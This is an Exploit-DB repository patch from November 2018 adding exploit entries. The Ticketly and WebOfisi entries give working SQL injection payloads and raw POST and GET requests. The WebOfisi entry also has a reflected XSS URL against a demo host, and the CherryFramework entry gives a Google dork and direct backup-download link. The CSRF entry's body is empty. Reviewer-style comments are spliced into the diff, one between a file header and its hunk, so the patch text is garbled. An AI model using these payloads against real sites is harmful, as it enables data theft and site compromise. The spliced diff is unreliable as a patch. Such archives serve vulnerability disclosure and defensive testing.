From 7967efda8246c3d8e049c5a6428fd3f2b4214a0b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 22 Nov 2018 05:01:42 +0000
Subject: [PATCH] DB: 2018-11-22
4 changes to exploits/shellcodes
macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)
Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)
Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)
Ticketly 1.0 - 'name' SQL Injection
WordPress CherryFramework Themes 3.1.4 - Backup File Download
WebOfisi E-Ticaret V4 - 'urun' SQL Injection
---
exploits/hardware/webapps/45894.txt | 28 ++++++++++++
exploits/php/webapps/45895.txt | 70 +++++++++++++++++++++++++++++
exploits/php/webapps/45896.txt | 24 ++++++++++
exploits/php/webapps/45897.txt | 44 ++++++++++++++++++
files_exploits.csv | 6 ++-
5 files changed, 171 insertions(+), 1 deletion(-)
create mode 100644 exploits/hardware/webapps/45894.txt
create mode 100644 exploits/php/webapps/45895.txt
create mode 100644 exploits/php/webapps/45896.txt
create mode 100644 exploits/php/webapps/45897.txt
diff --git a/exploits/hardware/webapps/45894.txt b/exploits/hardware/webapps/45894.txt
new file mode 100644
index 000000000..a1a5dcf57
--- /dev/null
+++ b/exploits/hardware/webapps/45894.txt
@@ -0,0 +1,28 @@
+# Title: Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)
+# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
+# Exploit Date: 2018-11-17
+# Vendor: Synaccess Networks Inc.
+# Product web page: https://www.synaccess-net.com
+# Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
+# Tested on: Synaccess server
+# CVE: N/A
+# Advisory ID: ZSL-2018-5501
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php
+
+# Desc: The application interface allows users to perform certain
+# actions via HTTP requests without performing any validity checks
+# to verify the requests. This can be exploited to perform certai
+# actions with administrative privileges if a logged-in user visits
+# a malicious web site.
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45895.txt b/exploits/php/webapps/45895.txt
new file mode 100644
index 000000000..6d2662d96
--- /dev/null
+++ b/exploits/php/webapps/45895.txt
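Review bot: The description in 45894.txt has a truncated word, "perform certai actions", which should read `# to verify the requests. This can be exploited to perform certain`. The hunk header announces 28 added lines but the twelve lines after the description are empty on this page, so the PoC body itself cannot be reviewed here; presumably it was dropped by the rendering rather than by the commit, which is worth confirming against the repository. The description would also be more useful to defenders if it named the missing control, for example a per-session anti-CSRF token or Origin/Referer validation on state-changing requests.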
@@ -0,0 +1,70 @@
+# Exploit Title: Ticketly 1.0 – 'name' SQL Injection
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-11-19
+# Google Dork: N/A
+# Vendor: Abisoft (https://abisoftgt.net)
+# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
+# Affected Version: 1.0
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: Windows & Ubuntu
+# Tested on: Win10x64 & Kali Linux
+# 6. References:
+# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/
+# CVE: N/A
+
+# 1. Technical Description:
+# Ticketly 1.0 are affected by SQL Injection in multiple parameters and
+# resources through POST. This allows a attacker to read and modify
+# sensitive information from the database used by the application.
+
+# 2. Proof Of Concept (PoC):
+# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)
+---
+POST /ticketly/action/addproject.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/ticketly/projects.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Connection: close
+
+name=Test%22&description=Test
+---
+
+# 2.2 In another request, add two ' to receive a code 200 OK
+---
+POST /ticketly/action/addproject.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/ticketly/projects.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Connection: close
+
+name=Test%22%22&description=Test
+---
+
+# 3. Payloads
+# 3.1 Payload (boolean-based blind)
+name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
+
+# 3.2 Payload (error-based)
+name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
+
+#3.3 Payload (AND/OR time-based blind)
+name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
+
+# 4. Vulnerables resources and parameters
+# /action/addproject.php (description, name, category_id and description)
+# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
+# /reports.php (kind_id y status_id)
\ No newline at end of file
diff --git a/exploits/php/webapps/45896.txt b/exploits/php/webapps/45896.txt
new file mode 100644
index 000000000..2b54c5318
--- /dev/null
+++ b/exploits/php/webapps/45896.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Wordpress CherryFramework Themes 3.1.4 - Backup File Download
+# Google Dork: inurl:/wp-content/themes/CherryFramework
+# Date: 2018-11-17
+# Exploit Author: b1p0l4r
+# Vendor Homepage: http://www.cherryframework.com/
+# Software Link: http://www.cherryframework.com/
+# Version: 3.x.x > 3.1.4
+# Tested on: Ubuntu 18.0.4.1
+# CVE : N/A
+
+# The CherryFramework Cherry theme 3.1.4 for WordPress allow
+# remote attackers to
+# obtain potentially sensitive information via
+# wp-content/themes/CherryFramework/admin/data_management/ download_backup.php
+# because it
+# offers the option of a ZIP archive containing the entire content of the wp-content/themes directory.
+
+# [PoC]
+# just open that files/link and then showing the popup for saving a .ZIP file
+# EXAMPLE LINK =
+
+https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php
+
+# IndoXploit, ZeroByte.ID, Eldersc0de Family, Exploiter Xero Team
\ No newline at end of file
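Review bot: The header of 45895.txt states `# CVE: N/A`, yet the reference URL two lines above it names cve-2018-18923; if that assignment is confirmed the line should read `# CVE: CVE-2018-18923`, otherwise the reference should say the ID is pending, because defenders key patch tracking on this field. The PoC text in 2.1 and 2.2 says to add a single quote, but both requests send `%22`, a double quote, so the prose and the request disagree. In section 4, `king_id` is presumably `kind_id` (the name used for reports.php) and `description` is listed twice for addproject.php; the Spanish "y" in the reports.php line should be "and", and "# 6. References" sits out of sequence before section 1.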
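Review bot: The line `# Version: 3.x.x > 3.1.4` in 45896.txt reads as "newer than 3.1.4", which contradicts the title naming 3.1.4 as the affected release; presumably `# Version: 3.x.x <= 3.1.4` was meant, and the file should state the range unambiguously. The path in the description contains a stray space, `data_management/ download_backup.php`, which does not match the example link; `# Tested on: Ubuntu 18.0.4.1` is likely 18.04.1, and "allow remote attackers" should be "allows". The write-up does not say whether the endpoint is reachable without authentication; that precondition decides severity and should be stated explicitly.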
diff --git a/exploits/php/webapps/45897.txt b/exploits/php/webapps/45897.txt
new file mode 100644
index 000000000..82c5e0548
--- /dev/null
+++ b/exploits/php/webapps/45897.txt
@@ -0,0 +1,44 @@
+# Exploit Title: WebOfisi E-Ticaret V4 - 'urun' SQL Injection
+# Date: 2018-11-21
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: https://www.web-ofisi.com
+# Software Demo: http://demobul.net/eticaretv4/
+# Software Link: https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing
+# Version: v4.0
+# Category: Webapps
+# Tested on: XAMPP for Linux
+# Description: E-Ticaret v4 is a professional online shopping script with many features.
+# Vulnerabilities have been discovered during penetration testing.
+
+# PoC : SQLi :
+# Request : /eticaretv4/arama.html?kategori=20&urun=test
+
+# Parameter : urun (GET)
+# Type : boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload:
+
+kategori=20&urun=test") RLIKE (SELECT (CASE WHEN (6525=6525)THEN 0x74656474 ELSE 0x28 END)) AND ("YWLa"="YWLa
+
+# Type: error-based
+# Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload:
+
+kategori=20&urun=test") OR (SELECT 6556 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT(ELT(6556=6556,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("ExaV"="ExaV
+
+# Type: stacked queries
+# Title: MySQL < 5.0.12 stacked queries (heavy query)
+# Payload:
+
+kategori=20&urun=test");SELECT BENCHMARK(5000000,MD5(0x44527964)) AND ("KGaO"="KGaO
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload:
+
+kategori=20&urun=test") OR SLEEP(5) AND ("sDnb"="sDnb
+
+# PoC : XSS :
+# Payload :
+http://demobul.net/eticaretv4/arama.html?kategori=20&urun=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
\ No newline at end of file
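Review bot: 45897.txt documents a second finding, the reflected cross-site scripting in the same `urun` parameter at the end of the file, but neither the Exploit Title nor the files_exploits.csv row added in the last hunk mentions it, so anyone searching the index for the XSS will not find it; either extend the title to name both issues or file the XSS as its own entry. The description line `# Vulnerabilities have been discovered during penetration testing.` says nothing about what is affected; it should name the resource (arama.html) and the parameter so the entry is useful without reading the payloads. `# Tested on: XAMPP for Linux` would also benefit from the XAMPP and MySQL versions, since the payload titles themselves are version-conditional.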
diff --git a/files_exploits.csv b/files_exploits.csv
index 27ac7af8f..a1d4d608a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6194,7 +6194,7 @@ id,file,description,date,author,type,platform,port
 45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
 45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
 45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
-45891,exploits/macos/dos/45891.c,"macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
+45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -40396,3 +40396,7 @@ id,file,description,date,author,type,platform,port
 45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80
 45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80
 45892,exploits/php/webapps/45892.txt,"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-20,"Javier Olmedo",webapps,php,80
+45894,exploits/hardware/webapps/45894.txt,"Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)",2018-11-21,LiquidWorm,webapps,hardware,
+45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80
+45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80
+45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80